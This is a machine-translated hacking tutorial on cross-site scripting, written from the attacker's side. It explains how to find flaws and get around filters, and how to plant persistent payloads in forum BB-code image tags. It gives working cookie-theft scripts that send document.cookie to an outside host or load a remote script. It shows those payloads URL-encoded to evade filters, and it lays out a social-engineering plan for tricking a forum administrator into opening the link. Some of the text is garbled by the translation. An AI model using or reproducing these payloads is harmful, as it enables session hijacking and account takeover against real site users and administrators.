This page has been robot translated, sorry for typos if any. Original content here.

Description Xss from A to Z.



  • Xss is Css => Cross Site Scripting
  • How to use XSS
  • What is XSS attack?
  • What are passive and active XSS?
  • So, let me turn specifically to how to find in this site XSS.
  • And how to determine if there is a filter or not?
  • Active XSS
  • We've been doing type codes all the time.
  • How to substitute it to the link with Xss?


  • Xss is Css => Cross Site Scripting

    Not to be confused with CSS also called XSS
    For the first time this BAG appeared in 1997.



    How to use XSS.


    First we need to know what a cookie is.
    If you know, you can skip it.

    Cookies are used to store site credentials on a visitor’s computer.
    If you have registered on the site under the nickname 'blabluble', then the site saved on your computer a cookie file where your data is encoded.
    And if you have an admin and you have access to the site, and I am the user who stole cookies from you (admin), then I can safely go to the site, and the site defines me as 'admin' - I will have administrator rights.

    For changing (substitution of stolen) cookies, I advise you to use the CookieEdit program for IE or the built-in functions in Opera and Firefox.

    To intercept cookies, you need to find a place on the site where you can perform an XSS attack.


    What is XSS attack?


    XSS attacks are not attacks on the site itself, but on users of the site.
    XSS is a flaw in the filter application.

    There are passive XSS and active XSS.

    What are passive and active XSS?


    Passive ones are Xss, which require direct participation from the victim + there are specific limitations and difficulties.
    Therefore, passive XSS is not much appreciated.
    For example, you need to force her to follow a poisonous link, which will require social engineering, cunning.

    Active - these are XSS, which, do not require any additional actions on the part of the victim - she just needs to open the page with your XSS and the Java code will be executed automatically.
    Due to its automation - they are very useful and valuable.
    For example, active hss exist in BB tags due to insufficient filtering when you leave a message on the forum \ guest book \ chat, which will always be active with each update.




    So, let me turn specifically to how to find in this site XSS.


    As I wrote earlier that XSS consists of tags, they also consist of html, and javascript language =).

    Javascript can be entered in html.
    You can encode to bypass filters. But more about that later.

    How to learn that XSS on this site passes?
    The uzdavimosti type is terrible
    <script> alert () </ script> We are trying to insert this script into all the different fields ... if the message came out, the script was processed and executed.

    The most common XSS (observed in all places where there is poor filtering):

    "> <script> alert () </ script>

    All essence in "> .

    Let's think about what we do when we type in the "> <script> alert () </ script> field, what happens?

    We enter in the form "> <script> alert () </ script> some variable is assigned a field value. The variable is processed, "> executed, closes

    script and execute <script> alert () </ script>

    This XSS is the most common in search engines:

    We look through all the site fields and try to insert "> <script> alert () </ script>
    If the message came out, you found the XSS ...




    And how to determine if there is a filter or not?


    Just enter in any field: '';! - "<########> = & & (()}
    Next, open the html page and look for the word "########"
    and see the subsequent syvoly ..

    If <> remained, then this is the first sign of vulnerability - then the filter has a hole.
    If , "'\ characters remained as they were entered - this is the second sign of vulnerability - possible additional characters to the subsequent XSS attack.
    Then, if you open the HTML, you did not find <> then most likely a hole in the filter.
    If you open the HTML you find that <> replaced with other characters, then this is a bummer - a filter at
    least functioning normally.
    It is also possible to enter in the field to check the filtering like this: "> <> '" `, / \? @%

    Consider the case if the filter eats up <>

    In this case, there is a probability of a hole.
    For example, the filter condition eat <script>, <> and.
    Then try the <zxcvb script: alert ();

    The filter looks that there is nothing dangerous in <IMG% 20SRC = "java script: alert (); no, it closes and thus
    executing the script.

    Of course, if the filter does not filter various encodings, you can try to encode the script and insert the code.

    Everything should be tried by trial and error to look for ...
    Try to enter in the fields and carefully review what we got from the filter.
    By tykov method, understand how the filter works, whether it has flaws.
    If the filter is bad, we can always insert scripts.




    Active XSS


    Here it is necessary to use allowed tags and prekryvayas their, you must execute the query.

    For example, tags url, bb, img.
    The whole point of the insert is that we need to embed the request into the parser img or url. Img has many parameters besides src and alt.
    This bug is very often used on the forum, in guestbooks ...

    Consider active XSS.

    Warnings !!!

    Tags [fon * t], [im * g], [ur * l] write with * in order that they do not merge with the site code.
    To use these tags, delete * .

    For example, let's review the forum for the presence of using the tags [fon * t], [im * g], [ur * l] and try to insert a script into them or combine them:

    [im * g] http: //www.qwewqw.ru/1.jpg [/ im * g] A cross comes out ... it means img is used and we picked it up (it's just that img is turned on, and admins from creating a message it is removed, they say it is impossible to insert pictures and it can be used
    different shapes) if there is no cross ... and the whole inscription hangs, then try again like this:
    [im * g src = https: //www.qwewqw.ru/1.jpg]

    Well, for example, we achieved a cross with this:
    [im * g] https://www.qweqw.ru/1.jpg [/ im * g]

    Check if the filter is holding a space, add a space after expanding jpg:
    [im * g] https://www.qweqw.ru/1.jpg [/ im * g]
    if there is a cross, then everything is OK.

    Next, img has the dynsrc and lowsrc parameters that hold javascript. Trying to insert for example:
    [im * g] http://www.qwewqw.ru/1.jpg dynsrc = java script: alert () [/ im * g]
    check, send - a message appears - it means you have found the active XSS and instead of alert () you can insert any script.

    If the filter does not give up, try this:
    [im * g] http://www.qweqw.ru/ "/ dynsrc =" java script: alert () "/ 1.jpg [/ im * g]
    and
    [im * g] http://www.qwewqw.ru/ "/ dynsrc = java script: alert () / 1.jpg [/ im * g]

    If a cross came out of these examples, then https: //www.qweqw.ru/1.jpg is replaced with the address of the sniffer.

    There are cases when jpg is disabled by the admin.




    We've been doing type codes all the time:


    <script>alert('HakNet')</script>
    java script:alert('HakNet')
    java script:alert('HakNet')/1.jpg и так далие..
    But they did not bring any benefit, they are just codes for testing (testing) on ​​Xss.

    Here is the script:
    <script>
    img = new Image();
    img.src = "http://antichat.org/s/HakNet.gif?"+document.cookie;
    </script>
    He is already stealing cookies =)




    How to substitute it to the link with Xss?


    Yes, very easy ...
    There are several options:

    - 1) do this:
    http://*****.ru/free?p='><script>img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;"+document.cookie;</script> where the **** site with Xss.

    Here is the script itself:
    '><script>img = new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;</script>
    - 2) You can still do this:
    http://*****.ru/free?p='><script src=http://haknet.h16.ru/script/js.js></script> where it refers to http: // haknet .h16.ru / script / js.js

    and in js.js there are:
    img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie; This method is more reliable.

    But as I already wrote, sometimes there are difficulties with filters on the site (it does not roll our script).
    Then you need to think about how to get around it.
    You can just add something, change something, or delete it in the script.
    But there is a more reliable option when we simply encode the script. For this there is a lot of prog.
    There is a site like http://ha.ckers.org/xss.html (encoder-decoder).

    Here is an example:
    %68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E
    It was coded:

    http://*****.ru/free?p='><script src=http://haknet.h16.ru/script/js.js></script>
    - 3) Especially encryption is necessary not only to defraud filters, but also to deceive ADMIN when using PASSIVE CSU.

    Here is an example based on social engineering.
    We are looking for contact with the administrator of the forum in the forum to throw him a link to your site, and say like this "cool feature is on the site" and so far in the same spirit.
    And on our site you will have guessed it =) here is the script:

    <script language="JavaScript">
    document.location.href="%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E"
    </script>

    What does document.location.href do you ask me? )) .. this is a Java code that goes to the specified site without a request. So why do we do it, give us a link to the admin, and he went to our site, that's what's being done .. he is quickly thrown at

    %68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E and this is our Xss in encrypted form.

    Note: this will only work when Xss belongs to the admin of the site to which you dropped the link ...
    In other words, the difficulty of passive CSU is that vulnerability can be used ONLY if the victim is AUTHORIZED on a vulnerable site !!!